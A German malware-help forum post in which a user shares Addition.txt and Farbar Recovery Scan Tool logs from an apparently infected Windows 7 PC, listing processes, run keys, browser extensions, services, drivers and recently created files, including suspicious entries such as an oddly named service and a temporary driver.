  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.840
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-09-09 00:47:59.785
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-08-31 13:46:58.975
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2015-08-31 13:46:58.935
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+
Prozentuale Nutzung des RAM: 58%
Installierter physikalischer RAM: 4094.49 MB
Verfügbarer physikalischer RAM: 1705.98 MB
Summe virtueller Speicher: 8187.13 MB
Verfügbarer virtueller Speicher: 5521.21 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:186.31 GB) (Free:67.6 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)]
Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:483.76 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D)
Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C)
Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         

Geändert von Zympop (20.09.2015 um 19:24 Uhr)

Alt 20.09.2015, 19:12   #2
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



FRST

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:15-09-2015
durchgeführt von Kenny G (Administrator) auf KENNYG-PC (20-09-2015 19:34:14)
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 8 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcfgex.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [TrojanScanner] => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [3716624 2015-08-31] (Simply Super Software)
HKLM Group Policy restriction on software: C:\Program Files\BitDefender <====== ACHTUNG
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse-Agent] => "C:\Program Files\Bitdefender\Bitdefender\pmbxag.exe"
HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse] => "C:\Program Files\Bitdefender\Bitdefender\pwdmanui.exe" --hidden --nowizard
HKU\S-1-5-18\...\Run: [Bitdefender-Geldb�rse-Anwendungs-Agent] => "C:\Program Files\Bitdefender\Bitdefender\antispam32\bdapppassmgr.exe"
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG)
ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\System32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
Startup: C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopnotes.lnk [2014-08-30]
GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] ()
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08]
FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird
FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com

Chrome: 
=======
CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16]
CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16]
CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16]
CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15]
CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26]
CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26]
CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03]
CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03]
CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03]
CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03]
CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27]
CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03]
CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03]
CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03]
CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url>

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.)
S2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] ()
S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X]
S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X]
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation)
R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
U3 fwdiipog; \??\C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt
2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe
2015-09-20 19:17 - 2015-09-20 19:17 - 00045165 _____ C:\Users\Kenny G\Downloads\Addition.txt
2015-09-20 19:16 - 2015-09-20 19:34 - 00019125 _____ C:\Users\Kenny G\Downloads\FRST.txt
2015-09-20 19:15 - 2015-09-20 19:34 - 00000000 ____D C:\FRST
2015-09-20 19:14 - 2015-09-20 19:15 - 02191360 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe
2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log
2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable
2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe
2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt
2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe
2015-09-20 17:43 - 2015-09-20 18:26 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe
2015-09-20 17:31 - 2015-09-20 17:31 - 05635119 _____ (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\Documents\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Simply Super Software
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2015-09-19 17:25 - 2015-09-19 17:25 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe
2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs
2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT
2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders
2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik
2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 __RHD C:\MSOCache
2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd
2015-09-19 12:21 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
